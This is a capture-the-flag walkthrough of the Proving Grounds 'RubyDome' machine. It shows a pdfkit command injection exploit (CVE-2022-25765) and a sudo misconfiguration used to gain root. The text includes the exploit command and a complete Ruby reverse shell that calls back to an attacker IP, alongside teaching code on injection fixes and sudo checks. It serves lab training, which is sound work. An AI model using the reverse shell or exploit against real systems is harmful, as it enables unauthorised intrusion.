PG - RubyDome

In this walkthrough, we go through the RubyDome machine from Proving Grounds. The platform rates it Easy (see the machine info below). The initial foothold is command injection in a Ruby HTML-to-PDF application via CVE-2022-25765 (pdfkit), and privilege escalation abuses a sudo misconfiguration on a custom Ruby script to get root. So, let's get started without any delay.

RubyDome

Machine Info:

Title: RubyDome
IP address: 192.168.236.22
Difficulty: Easy
OS: Linux
Description: RubyDome is an Easy Linux machine that requires exploitation of CVE-2022-25765 for the initial foothold and exploitation of a sudo misconfiguration on a custom script to get root.

Enumeration:

  • I started with a standard nmap aggressive scan (-A; sudo is needed for the OS detection it includes). Only two of the default top 1000 ports were open: 22 (SSH, OpenSSH 8.9p1 on Ubuntu) and 3000 (HTTP, WEBrick 1.7.0 on Ruby 3.0.2); 53/tcp showed as filtered. The vulners entries in the output are version matches against Ruby 3.0.2 itself, not against the web application, and none of them leads to the foothold.

$ sudo nmap -A 192.168.236.22
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 22:07 IST

Nmap scan report for 192.168.236.22
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
3000/tcp open     http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF
| vulners: 
|   cpe:/a:ruby-lang:ruby:3.0.2: 
|     	PRION:CVE-2022-28738	7.5	https://vulners.com/prion/PRION:CVE-2022-28738
|     	OSV:BIT-RUBY-2022-28738	7.5	https://vulners.com/osv/OSV:BIT-RUBY-2022-28738
|     	CVE-2022-28738	7.5	https://vulners.com/cve/CVE-2022-28738
|     	PRION:CVE-2021-33621	6.5	https://vulners.com/prion/PRION:CVE-2021-33621
|     	OSV:BIT-RUBY-2021-33621	6.5	https://vulners.com/osv/OSV:BIT-RUBY-2021-33621
|     	CVE-2021-33621	6.5	https://vulners.com/cve/CVE-2021-33621
|     	PRION:CVE-2021-41819	5.0	https://vulners.com/prion/PRION:CVE-2021-41819
|     	PRION:CVE-2021-41817	5.0	https://vulners.com/prion/PRION:CVE-2021-41817
|     	OSV:BIT-RUBY-2021-41819	5.0	https://vulners.com/osv/OSV:BIT-RUBY-2021-41819
|     	OSV:BIT-RUBY-2021-41817	5.0	https://vulners.com/osv/OSV:BIT-RUBY-2021-41817
|     	CVE-2021-41819	5.0	https://vulners.com/cve/CVE-2021-41819
|     	CVE-2021-41817	5.0	https://vulners.com/cve/CVE-2021-41817
|     	PRION:CVE-2022-28739	4.3	https://vulners.com/prion/PRION:CVE-2022-28739
|     	OSV:BIT-RUBY-2022-28739	4.3	https://vulners.com/osv/OSV:BIT-RUBY-2022-28739
|     	CVE-2022-28739	4.3	https://vulners.com/cve/CVE-2022-28739
|     	RUBY:RUBY-2022-28739	0.0	https://vulners.com/rubygems/RUBY:RUBY-2022-28739
|     	RUBY:RUBY-2022-28738	0.0	https://vulners.com/rubygems/RUBY:RUBY-2022-28738
|_    	RUBY:RUBY-2021-33621	0.0	https://vulners.com/rubygems/RUBY:RUBY-2021-33621
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=30033%PV=Y%DS=4%DC=T%G=Y%TM=65C3B1E5
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=Z%TS=A)OPS(O1=M54EST1
OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54
OS:EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T
OS:=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N
OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=D06B%RUD
OS:=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   199.68 ms 192.168.45.1
2   199.64 ms 192.168.45.254
3   200.26 ms 192.168.251.1
4   200.38 ms 192.168.236.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.61 seconds

Screenshot: nmap scan

  • Browsing the web server on port 3000 shows a Ruby application, "RubyDome HTML to PDF", that fetches an HTML page from a user-supplied URL and converts it into a PDF document.

Screenshot: RubyDome HTML to PDF web page

Initial Access:

CVE-2022-25765

  • Looking for known exploits against a Ruby HTML-to-PDF endpoint, I found that the target uses the pdfkit gem, which in versions before 0.8.7.2 is vulnerable to CVE-2022-25765: a command injection through the URL that pdfkit passes to wkhtmltopdf, leading to RCE. I used the exploit below, specifying the target URL, the vulnerable parameter name (url) and our listener IP and port. With a netcat listener waiting on port 4444, the exploit completes and a reverse shell connects back to it.

Exploit: https://github.com/UNICORDev/exploit-CVE-2022-25765

python3 exploit-CVE-2022-25765.py -s 192.168.45.215 4444 -w http://192.168.236.22:3000/pdf -p url

Screenshot: firing the exploit

Screenshot: got initial access
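The exploit above hides the mechanics of the bug. As an added example (not code from the page, the exploit author or the pdfkit project), the Ruby below models the vulnerability class behind CVE-2022-25765: a user-supplied URL placed inside a shell command string that is handed to wkhtmltopdf, next to two hardened forms. The published proof of concept for the CVE is a URL with `%20` followed by backticked shell commands, and the payload here has the same shape, but it runs a harmless echo instead of a reverse shell. `echo` stands in for wkhtmltopdf so the code runs on any Linux machine; the payload, the stand-in renderer and the function names are assumptions for illustration.

```ruby
require 'open3'
require 'shellwords'

# Stand-in for the wkhtmltopdf binary so the example runs on any Linux box
# (assumption: `echo` and /bin/sh are available). A real HTML-to-PDF wrapper
# runs wkhtmltopdf <url> <output>, where "-" means "write the PDF to stdout".
RENDERER = 'echo'

# Vulnerable pattern: the caller-supplied URL is quoted and interpolated into
# ONE command string. Ruby hands a string containing shell metacharacters to
# /bin/sh -c, and double quotes do NOT suppress backtick or $() substitution,
# so shell commands embedded in the URL run with the web app's privileges.
def render_vulnerable(url)
  out, _status = Open3.capture2(%(#{RENDERER} "#{url}" -))
  out
end

# Hardened form 1: argv form. Each element is one literal argument and no
# shell is involved, so the URL can never be re-parsed as commands.
def render_safe_argv(url)
  out, _status = Open3.capture2(RENDERER, url, '-')
  out
end

# Hardened form 2: if a shell string is unavoidable, escape every untrusted
# piece with Shellwords.escape instead of hand-written quoting.
def render_safe_escaped(url)
  out, _status = Open3.capture2("#{RENDERER} #{Shellwords.escape(url)} -")
  out
end

# Constructed payload in the shape of the published CVE-2022-25765 proof of
# concept: a URL whose query string carries %20 followed by a backticked
# command. The command here is a harmless echo, not the exploit's reverse shell.
PAYLOAD = 'http://192.168.45.215/?name=%20`echo INJECTED`'

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{render_vulnerable(PAYLOAD)}"
  puts "argv:       #{render_safe_argv(PAYLOAD)}"
  puts "escaped:    #{render_safe_escaped(PAYLOAD)}"
end
```

Run it with `ruby inject_demo.rb`: the vulnerable function prints INJECTED where the backticked command sat, while both hardened functions print the URL verbatim, backticks included. For the application itself the fix is upgrading pdfkit to 0.8.7.2 or later; in your own code, prefer the argv form of Open3, IO.popen and system, and treat hand-written shell quoting as a bug.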

  • Captured the local flag.

Screenshot: local flag

Privilege Escalation:

  • Next, I enumerated sudo rights with the command below and found that our user can run /usr/bin/ruby /home/andrew/app/app.rb as root without a password (NOPASSWD).

sudo -l

Screenshot: sudo -l output

  • I checked the permissions on the app script and found that our user can write to it, which turns the sudo rule into "run arbitrary Ruby as root". (Check the parent directory as well: sudo matches only the command path as a string, so a writable directory would let us rename and replace the file even if the file itself were read-only.) I replaced the contents of the script with the reverse shell below.
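The two checks in this step (what sudo allows, and whether we can tamper with the allowed target) generalise beyond this box. As an added example that is not from the page, this Ruby function parses `sudo -l` output for NOPASSWD rules and flags every absolute path in the allowed command line that is writable by the current user, or that sits in a directory we can write to (enough to rename and replace the script even when the file itself is read-only). The sample `sudo -l` text, the hostname and the temporary app directory are constructed for the demonstration, not copied from RubyDome.

```ruby
require 'tmpdir'

# Parse `sudo -l` output and report NOPASSWD command targets that the current
# user can tamper with. sudo matches only the command line as a string; it does
# not care who owns the file at that path, so a writable script (or a writable
# parent directory, which lets us rename and replace the file) turns the rule
# into "run arbitrary code as root".
def writable_sudo_targets(sudo_l_output)
  findings = []
  sudo_l_output.each_line do |line|
    next unless line.include?('NOPASSWD:')
    # Everything after "NOPASSWD:" is the allowed command line, e.g.
    # "(ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb"
    argv = line.split('NOPASSWD:', 2).last.split
    argv.each do |tok|
      next unless tok.start_with?('/')
      parent = File.dirname(tok)
      if File.file?(tok) && File.writable?(tok)
        findings << [tok, :file_writable]
      elsif File.directory?(parent) && File.writable?(parent)
        findings << [tok, :parent_dir_writable]
      end
    end
  end
  findings
end

# Self-contained demonstration: build a throwaway app directory shaped like
# /home/andrew/app (constructed, not copied from the box), write a script we
# own into it, and run the check over constructed `sudo -l` output.
def demo
  Dir.mktmpdir('rubydome') do |dir|
    script = File.join(dir, 'app.rb')
    File.write(script, "puts 'hello'\n")
    sample = <<~SUDO
      Matching Defaults entries for andrew on rubydome:
          env_reset, mail_badpass

      User andrew may run the following commands on rubydome:
          (ALL) NOPASSWD: /usr/bin/ruby #{script}
    SUDO
    writable_sudo_targets(sample)
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

On a target, feed it the real output: `writable_sudo_targets(`sudo -l 2>/dev/null`)`. The interpreter path (/usr/bin/ruby) is checked too, which is deliberate: a NOPASSWD rule on a writable interpreter is just as fatal as one on a writable script.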

nano app.rb

#!/usr/bin/env ruby
# Reverse shell written over /home/andrew/app/app.rb; run through the NOPASSWD
# sudo rule it connects back to our listener as root.

require 'socket'
require 'open3'

# Attacker host and port (start `nc -lvnp 1234` on this host first)
RHOST = "192.168.45.215"
PORT  = 1234

# Retry every 20 seconds until the listener accepts the connection
begin
  sock = TCPSocket.new(RHOST, PORT)
  sock.puts "We are connected!"
rescue StandardError
  sleep 20
  retry
end

# Run each line received from the listener through a shell and send
# its stdout and stderr back over the socket
begin
  while (line = sock.gets)
    Open3.popen2e(line) do |_stdin, stdout_and_stderr, _wait_thr|
      IO.copy_stream(stdout_and_stderr, sock)
    end
  end
rescue StandardError
  retry
end

Screenshot: app.rb

  • With a netcat listener waiting on port 1234, executing the script through sudo gives us a reverse connection back at our listener as root.

sudo /usr/bin/ruby /home/andrew/app/app.rb

Screenshot: executing the script via sudo

Screenshot: got root

  • Finally, captured the root flag and marked the machine as complete.

Screenshot: proof flag


Conclusion:

So that was "RubyDome" for you. We started with a standard nmap scan and found two open ports: 22 (SSH) and 3000 (HTTP). Enumerating the web server on port 3000 showed a Ruby application that converts HTML pages to PDF documents. Searching for known exploits revealed that the target runs the pdfkit gem, which is vulnerable to CVE-2022-25765, a command injection leading to RCE, and we used it to get initial access. For privilege escalation, a sudo misconfiguration on a custom, user-writable Ruby script was abused to get root. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".
